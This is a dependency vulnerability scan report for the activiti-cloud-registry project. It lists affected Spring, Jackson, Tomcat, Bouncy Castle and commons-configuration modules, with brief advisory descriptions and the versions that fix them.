  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Incomplete Cleanup via multipart request handling in WebFlux. An attacker can exhaust disk space by sending multipart requests with large parts that trigger creation of temporary files, which under certain conditions are not deleted after the request completes, leading to accumulation of temp files and denial of service.

Remediation

Upgrade org.springframework:spring-web to version 6.2.18, 7.0.7 or higher.

References

Incomplete Cleanup vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in ReaderBasedJsonParser.java and UTF8DataInputJsonParser.java, when processing deeply nested data. A regression in 3.0 versions caused the StreamReadConstraints.maxNestingDepth setting for DataInput to not be checked, allowing resources to be overwhelmed by malicious inputs.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: commons-configuration:commons-configuration
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due several issues in the loading of untrusted configurations. An attacker can cause excessive resource consumption by manipulating the configuration data or introducing unexpected usage patterns. Users affected by this issue are recommended to upgrade to the 2.x version line org.apache.commons:commons-configuration2, which fixes these issues.

Note: This is only exploitable if the application is configured to load untrusted configurations.

Remediation

There is no fixed version for commons-configuration:commons-configuration.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity
new

Improper Validation of Syntactic Correctness of Input

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input in the processing of HTTP/2 request headers. An attacker can cause unexpected behavior or potentially compromise the application by sending specially crafted HTTP/2 request headers.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Improper Validation of Syntactic Correctness of Input vulnerability report

medium severity
new

Timing Attack

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Timing Attack via AJP secret comparison. An attacker can determine whether a guessed secret is correct by measuring the time taken to compare secrets, potentially allowing unauthorized access through a timing side-channel attack.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Timing Attack vulnerability report

medium severity
new

Exposure of Private Personal Information to an Unauthorized Actor

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-websocket
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21

Overview

Affected versions of this package are vulnerable to Exposure of Private Personal Information to an Unauthorized Actor in WebSocket client during authentication. An attacker can obtain sensitive HTTP authentication headers by initiating a WebSocket handshake with a malicious host.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-websocket to version 8.0.1, 9.0.0.M1, 9.0.118, 10.1.55, 11.0.22 or higher.

References

Exposure of Private Personal Information to an Unauthorized Actor vulnerability report

medium severity
new

LDAP Injection

  • Vulnerable module: org.bouncycastle:bcprov-jdk18on
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3 and org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81

Overview

Affected versions of this package are vulnerable to LDAP Injection via the parseDN handling and the LDAP store helpers in X509LDAPCertStoreSpi and LDAPStoreHelper. An attacker can influence LDAP search filters by supplying a crafted X.500 subject or issuer string that is parsed into an unescaped filter value. This lets the attacker alter the directory query used to locate certificates and CRLs, causing the application to retrieve incorrect LDAP entries or fail to find the intended ones, which can break certificate validation and revocation checks.

Remediation

Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.

References

LDAP Injection vulnerability report

medium severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
